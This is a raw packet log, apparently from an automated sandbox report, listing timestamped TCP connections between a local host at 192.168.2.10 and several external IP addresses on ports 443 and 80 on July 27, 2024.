Jul 27, 2024 11:39:04.896038055 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.896101952 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.896229029 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.896248102 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.896544933 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.896730900 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.896748066 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898431063 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898462057 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898483038 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.898494005 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898503065 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898552895 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898561954 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.898566961 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.898674965 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.899348021 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.899377108 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.899586916 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.899594069 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.899971008 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.899975061 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.900013924 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.900130987 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.900145054 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.901932955 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.901958942 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.901984930 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.901990891 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.902138948 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.902143955 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.902198076 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.902261019 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.902276039 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.952462912 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.000852108 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.001482964 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.001538992 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.001573086 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.001586914 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.001688957 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.001693964 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.002388954 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.002491951 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.002499104 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.002943993 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.003002882 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.003017902 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.003083944 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.003725052 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.003803015 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.005326986 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.005585909 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.006191015 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.006449938 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.007052898 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.007105112 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.007150888 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.007158041 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.007224083 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.007945061 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.008099079 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.008667946 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.008775949 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.009682894 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.009741068 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.009758949 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.010390997 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.010551929 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.010632038 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.011483908 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.011538982 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.011555910 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.011574984 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.011652946 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.062045097 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.062055111 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.090617895 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.090687037 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.090694904 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.090785980 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.091037989 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.091046095 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.091110945 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.092408895 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.092416048 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.092514038 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.092602015 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.092608929 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.092653990 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.093365908 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.093472958 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.095247984 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.095491886 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.095495939 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.095609903 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.095884085 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096055031 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096303940 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.096308947 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096363068 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.096788883 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096839905 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096884966 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.096884966 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.096889973 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.096945047 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.097670078 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.097733021 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.098604918 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.098661900 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.099420071 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.099483013 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.100141048 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.100327969 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.100332975 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.100433111 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.100966930 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.101022959 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.184286118 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.184410095 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.184410095 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.184442043 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.184495926 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.184495926 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.189193010 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.190072060 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.191108942 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.191185951 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.192666054 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.192744970 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.192770004 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.192869902 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.192919970 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.192919970 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.192931890 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.193129063 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194123983 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.194128990 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194180012 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194231987 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.194231987 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.194236994 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194320917 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.194322109 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194345951 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.194403887 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.194405079 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.195076942 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.195156097 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.195171118 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.195220947 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.195255995 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.195357084 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200409889 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200463057 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200504065 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200536966 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200651884 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200659037 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200671911 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200742960 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200747967 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200768948 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200792074 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200797081 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200845003 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200876951 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200938940 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.200951099 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.200985909 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.201020002 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.201025009 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.201148987 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.201786041 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.201829910 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.201842070 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.201864004 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.201971054 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.202667952 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.202743053 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.203704119 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.203780890 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.203784943 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.203823090 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.203824997 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.203845978 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.203886032 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.203984022 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:05.204092979 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.204303980 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:05.204319000 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:06.889971972 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:08.202590942 CEST	49674	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:08.202591896 CEST	49675	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:11.702543974 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:13.046271086 CEST	49671	443	192.168.2.10	204.79.197.203
Jul 27, 2024 11:39:20.632488966 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:20.927915096 CEST	49711	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:20.927962065 CEST	443	49711	173.222.162.55	192.168.2.10
Jul 27, 2024 11:39:20.928045988 CEST	49711	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:20.928615093 CEST	49711	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:20.928631067 CEST	443	49711	173.222.162.55	192.168.2.10
Jul 27, 2024 11:39:20.936913013 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:21.311899900 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:21.546255112 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:22.037085056 CEST	443	49711	173.222.162.55	192.168.2.10
Jul 27, 2024 11:39:22.037158966 CEST	49711	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:22.905641079 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:25.311892033 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:30.124439955 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:39.733913898 CEST	49672	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:39:41.196022034 CEST	443	49711	173.222.162.55	192.168.2.10
Jul 27, 2024 11:39:41.196095943 CEST	49711	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:40:00.699955940 CEST	49713	80	192.168.2.10	38.47.158.160
Jul 27, 2024 11:40:00.704833984 CEST	80	49713	38.47.158.160	192.168.2.10
Jul 27, 2024 11:40:00.704905987 CEST	49713	80	192.168.2.10	38.47.158.160
Jul 27, 2024 11:40:00.707182884 CEST	49713	80	192.168.2.10	38.47.158.160
Jul 27, 2024 11:40:00.711952925 CEST	80	49713	38.47.158.160	192.168.2.10
Jul 27, 2024 11:40:01.487265110 CEST	80	49713	38.47.158.160	192.168.2.10
Jul 27, 2024 11:40:01.487421036 CEST	80	49713	38.47.158.160	192.168.2.10
Jul 27, 2024 11:40:01.487943888 CEST	49713	80	192.168.2.10	38.47.158.160
Jul 27, 2024 11:40:01.490530014 CEST	49713	80	192.168.2.10	38.47.158.160
Jul 27, 2024 11:40:01.495501041 CEST	80	49713	38.47.158.160	192.168.2.10
Jul 27, 2024 11:40:24.680243015 CEST	49714	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:24.685132980 CEST	80	49714	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:24.685247898 CEST	49714	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:24.687130928 CEST	49714	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:24.692049980 CEST	80	49714	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:25.161601067 CEST	80	49714	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:25.161712885 CEST	49714	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:26.203236103 CEST	49714	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:26.208445072 CEST	80	49714	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:27.221314907 CEST	49715	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:27.226356030 CEST	80	49715	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:27.226474047 CEST	49715	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:27.229099989 CEST	49715	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:27.233906984 CEST	80	49715	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:27.702717066 CEST	80	49715	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:27.702874899 CEST	49715	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:28.734134912 CEST	49715	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:28.739341021 CEST	80	49715	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:29.752989054 CEST	49716	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:29.758124113 CEST	80	49716	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:29.758217096 CEST	49716	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:29.760888100 CEST	49716	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:29.765774965 CEST	80	49716	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:29.765904903 CEST	80	49716	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:30.225848913 CEST	80	49716	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:30.225965977 CEST	49716	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:31.265403986 CEST	49716	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:31.270368099 CEST	80	49716	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:32.283759117 CEST	49717	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:32.288615942 CEST	80	49717	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:32.288705111 CEST	49717	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:32.291311026 CEST	49717	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:32.296565056 CEST	80	49717	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:32.768960953 CEST	80	49717	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:32.768990993 CEST	80	49717	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:32.769254923 CEST	49717	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:32.772650003 CEST	49717	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:40:32.778196096 CEST	80	49717	3.33.130.190	192.168.2.10
Jul 27, 2024 11:40:38.184827089 CEST	49718	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:38.189855099 CEST	80	49718	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:38.189961910 CEST	49718	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:38.192493916 CEST	49718	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:38.197328091 CEST	80	49718	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:38.802273035 CEST	80	49718	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:38.802335978 CEST	80	49718	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:38.802512884 CEST	49718	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:39.702967882 CEST	49718	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:40.733088017 CEST	49719	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:40.738300085 CEST	80	49719	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:40.738399029 CEST	49719	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:40.741687059 CEST	49719	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:40.746668100 CEST	80	49719	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:41.367245913 CEST	80	49719	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:41.367489100 CEST	80	49719	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:41.367654085 CEST	49719	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:42.249726057 CEST	49719	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:43.267841101 CEST	49720	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:43.273869991 CEST	80	49720	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:43.274715900 CEST	49720	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:43.276724100 CEST	49720	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:43.282073975 CEST	80	49720	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:43.283761024 CEST	80	49720	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:43.923430920 CEST	80	49720	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:43.923500061 CEST	80	49720	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:43.923573017 CEST	49720	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:44.781636000 CEST	49720	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:45.800625086 CEST	49721	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:45.807725906 CEST	80	49721	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:45.807848930 CEST	49721	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:45.810230970 CEST	49721	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:45.815072060 CEST	80	49721	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:46.413665056 CEST	80	49721	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:46.413732052 CEST	80	49721	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:46.414119959 CEST	49721	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:46.417771101 CEST	49721	80	192.168.2.10	203.161.43.228
Jul 27, 2024 11:40:46.422627926 CEST	80	49721	203.161.43.228	192.168.2.10
Jul 27, 2024 11:40:52.224025965 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:52.228928089 CEST	80	49722	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:52.229017019 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:52.231821060 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:52.236715078 CEST	80	49722	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:53.249737978 CEST	80	49722	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:53.249751091 CEST	80	49722	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:53.249831915 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:53.249949932 CEST	80	49722	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:53.250108004 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:53.734251976 CEST	49722	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:54.752701044 CEST	49723	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:54.757895947 CEST	80	49723	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:54.758001089 CEST	49723	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:54.759890079 CEST	49723	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:54.765227079 CEST	80	49723	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:55.568243980 CEST	80	49723	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:55.568434000 CEST	80	49723	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:55.569046974 CEST	49723	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:56.265779018 CEST	49723	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:57.285209894 CEST	49724	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:57.290235996 CEST	80	49724	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:57.290533066 CEST	49724	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:57.292507887 CEST	49724	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:57.297434092 CEST	80	49724	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:57.297517061 CEST	80	49724	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:58.796775103 CEST	49724	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:58.802171946 CEST	80	49724	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:58.802459955 CEST	49724	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:59.820374012 CEST	49725	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:59.825906992 CEST	80	49725	38.47.158.215	192.168.2.10
Jul 27, 2024 11:40:59.825978041 CEST	49725	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:40:59.828289986 CEST	49725	80	192.168.2.10	38.47.158.215
